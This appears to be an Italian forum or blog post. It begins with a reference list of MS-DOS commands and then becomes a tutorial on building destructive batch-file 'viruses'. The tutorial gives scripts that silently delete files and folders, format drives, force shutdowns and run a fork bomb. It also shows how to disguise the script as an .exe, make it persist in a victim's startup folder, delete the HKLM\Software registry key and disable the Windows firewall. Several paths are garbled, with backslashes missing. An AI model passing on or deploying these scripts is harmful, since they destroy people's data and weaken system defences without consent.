In informatica, e in particolare nella
terminologia di MS-DOS e Windows, un file batch o comando batch è un
file di testo che contiene una sequenza di comandi per l'interprete di
comandi del sistema (solitamente command.com o cmd.exe). Il file batch
viene eseguito dall'interprete dei comandi mandando in esecuzione,
secondo la sequenza specificata, i comandi elencati nel file. I
comandi batch di MS-DOS devono avere estensione .bat per essere
riconosciuti come tali dal sistema operativo mentre i sistemi NT
(Windows NT/2000/XP e successivi) accettano anche l'estensione .cmd.
Il file batch forse più famoso è Autoexec.bat perché veniva
eseguito automaticamente all'avvio di tutti i sistemi operativi basati
su MS-DOS.
I comandi MS-DOS sono:
* assign - reindirizza tutte le richieste a un drive, verso un altro
drive
* attrib - visualizza o modifica gli attributi dei file
* backup - crea una copia di sicurezza di uno o più file su una serie
di floppy-disk
* break - abilita o disabilita l'interruzione o l'esecuzione fornita
da CTRL C e CTRL BREAK
* cd - entra in una directory
* chdir - cambia la directory corrente o ne visualizza il nome
* chkdsk - analizza il contenuto del disco e visualizza una relazione
sul suo stato
* cls - cancella il contenuto della schermata (questo comando non è
distruttivo)
* color - permette di impostare il colore dello sfondo e del testo
* command - avvia un nuovo interprete dei comandi MS-DOS
* comp - confronta il contenuto di un file o gruppo di file con altri
* copy - copia uno o più file in un altro punto del disco
* ctty - cambia la console di input/output da cui vengono impostati i
comandi
* date - visualizza e permette di aggiornare la data
* defrag - riorganizza i file in un disco rigido per ottimizzarne
l'uso
* del - cancella uno o più file
* deltree - elimina una directory e tutti i file e le sottodirectory
in essa contenute
* dir - visualizza il contenuto di una directory
* discopy - copia il contenuto di un disco floppy in un altro disco
floppy
* diskcomp - confronta il contenuto di due dischetti dello stesso tipo
* doskey - ripete gli ultimi comandi digitati
* echo - abilita o disabilita l'eco da file batch
* edit - avvia MS-DOS Editor per creare o modificare i file ASCII
* edlin - avvia un editor di righe di testo. Per magg. informazioni (Prompt
comandi e edlin/?)
* emm386 - abilita o disabilita la memoria espansa di EMM386
* erase - cancella uno o piu file specificati
* exit - provoca l'uscita dall’interprete dei comandi
* expand - decomprime uno o più file compressi
* fastopen - accellera l'apertura di un programma
* fc - confronta il contenuto di due file
* fdisk - configura un disco rigido creando le partizioni, per
l'utilizzo di MS-DOS
* find - ricerca una sequenza di caratteri all'interno di uno o piu
file
* for - permette di eseguire in modo iterattivo comandi di MS-DOS
* format - formatta un disco per l'utilizzo di MS-DOS
* goto - trasferisce l'esecuzione ad una determinata posizione di un
file batch
* graftabl - carica in memoria i caratteri ASCII non BIOS per i modi
grafici
* help - visualizza la guida di MS-DOS. ATTENZIONE la guida è troppo
lunga per essere visualizzata in una sola schermata, quindi per
visualizzarla schermata per schermata digitare help|more (il simbolo
"|" è il tasto alla sinistra tasto uno (1) altrimenti
alt+124 = "|" e scrivere more
* hexdump - lista in formato esadecimale il contenuto di un file, byte
per byte
* if - condiziona l'esecuzione di un comando in un file batch
* ipconfig - visualizza configurazione IP di Windows. ATTENZIONE per
maggiori informazioni digitare ipconfig/all
* join - unisce un drive di disk ad una directory vuota su di un altro
drive
* keyb - configura la tastiera per la lingua specificata
* label - crea, modifica o elimina l'etichetta di volume di un disco
* md - crea una directory
* mem - visualizza la quantità della memoria usata e quella libera
del sistema
* mode - stabilisce le modalità di visualizzazione e trasmissione per
la stampante
* more - permette la visualizzazione di informazioni, (files, pagine,
o altri tipi di dati) che per la loro grandezza (insieme di righe)
devono essere visualizzate con più schermate alla volta. ATTENZIONE
è necessario che "more" sia preceduto dal simbolo
"|" ALT+124. Ex. help|more. Prestare ulteriore ATTENZIONE in
alcuni computers o Sistemi operativi anteriori al MS-DOS 6.0 non
riconoscono il simbolo "|" è, perciò, necessario digitare
il simbolo "/" seguito da una p. Ex. help/p
* path - visualizza o imposta un percorso di ricerca per file
eseguibili
* pause - provoca una pausa nell'esecuzione di un file batch per
consentire un input da operatore
* print - stampa un file di testo
* prompt - cambia il prompt dei comandi di MS-DOS
* rd - cancella una directory
* recover - recupera un file o un intero disco con settori danneggiati
* rem - visualizza commenti durante l'esecuzione di un file batch
* ren - rinomina uno o più file
* replace - sostituisce i file
* restore - ripristina dai dischi di back-up un certo numero di file
* rmdir - rimuove una sottodirectory vuota
* select - copia il dischetto MS-DOS per creare una copia di lavoro
per la nazionalità selezionata della tastiera
* set - assegna un valore di sostituzione ad un parametro con chiave
presente in un programma applicativo o in un file batch
* share - installa la condivisione ed il bloccaggo dei file MS-NET
* shift - aumenta il numero di parametri sostituibili in un file batch
* shutdown - arresta o riavvia il sistema
* sort - ordina i dati alfabeticamente, in un senso o nell'altro
* subst - associa un percorso ad una lettera di unità
* sys - copia i file di sistema di MS-DOS e l'interprete dei comandi
sul disco specificato
* time - visualizza e consente di modificare l'ora
* title - permette di impostare il titolo della finestra
* tree - visualizza tutte le directory ed i percorsi del drive
specificato
* type - visualizza il contenuto di un file di testo
* undelete - ripristina i file cancellati precedentemente con il
comando del
* unformat - ripristina i dati di un disco cancellati con il comando
format
* ver - visualizza la versione di MS-DOS in uso
* verify - abilita la verifica dei dati in scrittura
* vol - visualizza l'etichetta e il numero di serie di volume del
disco
* win - esegue Windows
* xcopy - copia i file e la struttura delle directory (ad esclusione
dei file nascosti e di sistema)
Premetto che i file .bat sono dei file contenente codice maligno e non
sono dei veri e propri virus ma io userò questo termine per
comodità!
Come salvare un virus?
1) Aprire il blocco note
2) Incollarci il codice
3) Chiudere e salvare il file in “nome”.bat
Virus Per Cancellare Un File:
1) Aprite il blocco note
2) Incollateci il seguente codice:
@DEL /comando "C:percorsopercorso *.*"
3) Chiudete e salvate in .bat
IN DETTAGLIO: Che significa quel codice?
Allora:
1)@DEL = E il comando per cancellare i file
2) /comando = Bisognerebbe inserire 1 o più comandi tra questi:
a) /P Chiede conferma prima di eliminare ogni file.
b) /F Forza l'eliminazione dei file di sola lettura.
c) /S Elimina i file specificati da tutte le sottodirectory.
d) /Q Modalità silenziosa, non chiede conferma per eliminazioni
globali.
e) /A Seleziona i file da eliminare in base agli attributi.
3) *.* = Il PRIMO asterisco serve per cancellare TUTTI i file con un
certo nome, come:
eversor.*
4) *.* = Il SECONDO asterisco serve per cancellare QUALSIASI tipo di
ESTENSIONE di un file, come:
*.txt
5) QUINDI, in sostanza se dobbiamo cancellare il file "eversor"
in .txt sul desktop, faremo:
CODICE
@DEL /S /Q "C:ProgrammiDocuments and
settings%USERNAME%Desktopeversor.txt”
Virus Per Cancellare Una Cartella:
1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
@RD /s /q “C:Percorso_Cartella”
3) Salvare in .bat
IN DETTAGLIO: Perchè @RD?
@RD Serve in questo per cancellare una cartella, mentre @DEL era per
File, @RD è per cartella.
Virus Per Formattare un unità:
1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
CODICE
format “unità”: /autotest /q /u
3) Salvare in .bat
IN DETTAGLIO: Questo virus formatta l’unità senza chiedere conferma
(/q) e non permette di essere bloccata piu avanti (/u).
N.B. Non è possibile formattare l’unità in uso e quindi l’unità
C non potrà essere formattata!
Virus Per Disconnettere/Riavviare/Spegnere il PC:
1) Aprire il blocco note
2) Inserire dentro il seguente codice:
shutdown -comando
3) Salvare in .bat
IN DETTAGLIO: Il -comando può essere sostituito tra i seguenti:
a) -i : Attiva l’interfaccia utente grafica
b) -l : Disconnette l'utente
c) -r : Riavvia il PC
d) -s : Spegne il computer
e) -t xx: xx Sarebbero i secondi di attesa prima della chiusura di
Windows
f) -f : Chiude le applicazioni ancora aperte
Virus Per Far Impallare Il PC:
1) Aprire il blocco note
2) Inserire dentro il seguente codice:
:1
START
goto :1
3) Salvare in .bat
IN DETTAGLIO: Il comando START serve ad aprire nuove finestre MS-DOS.
Il comando GOTO ridirige ad una riga di comando, in questo caso
“:1” e quindi fa eseguire il comando start all’infinito!
Trasformare Il .bat In .exe
1) Scaricate il seguente programma: Batch To Exe 1.2
2) Apritelo e scegliete le opzioni, si può anche cambiare l'icona del
file
Aumentare Il Peso Del Virus
1) Aprire il blocco note
2) Incollarci dentro il codice
3) Aggiungere il codice:
@REM parole a caso… ma tante!
4) Salvare in .bat
IN DETTAGLIO: Perchè @REM?
@REM serve per "Inserire Commenti", ma se noi al posto dei
commenti mettiamo non so, 500 volte la lettere
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, non faremo altro che AUMENTARE il
peso del virus.
Salvare il virus nell’esecuzione automatica in modo che parta ad
ogni avvio del computer:
1) Aprire il blocco note
2) Aggiungere il seguente codice: echo “comando batch” >
“C:Documents and settings%USERNAME%menu avvioprogrammiesecuzione
automatica(nomevirus.bat)”
IN DETTAGLIO: Perché “>”?
Il segno maggiore (>) serve a salvare l’output di un comando
batch in un altro file, in questo caso il nostro (nomefile.bat).
Il comando usato in questo caso è “echo” che serve a stampare a
schermo una scritta.
Al posto di “comando batch” dovremo inserire il comando da
utilizzare all’avvio del computer.
In questo modo il “comando batch” sarà la scritta di output del
comando “echo” e verrà quindi salvato nel nostro (nomevirus.bat)
nell’esecuzione automatica.
Ciò che segue il segno “>” è il percorso dove verrà salvato
il file .bat e la variabile %USERNAME% sostituisce il nome utente
della vittima che noi non sappiamo.
Comandi per il registro di sistema:
REG EXPORT HKLMSoftware C:nomefile.txt
In questo modo viene esportata la stringa Hkey Local MachineSoftware
nel file "C:nomefile.txt"
REG IMPORT "nomefile.reg"
In questo modo viene importato nel registro di sistema il fiole "nomefile.reg"
REG DELETE HKLMSoftware C:nomefile.txt
In questo modo eliminiamo la chiave Software e le sue sottochiavi!
X gli altri comandi basta scrivere REG /? nel prompt de Dos!
ALTRI COMANDI VARI:
Terminare un processo:
taskkill /f /im "nomeprocesso.exe"
Terminare un servizion:
net stop "nomeservizio"
Per riavviare il sevizio:
net start "nomeservizio"
Disattivare firewall di windows:
Netsh firewall set opmode disable
Abilitare il firewall:
Netsh firewall set opmode enable |
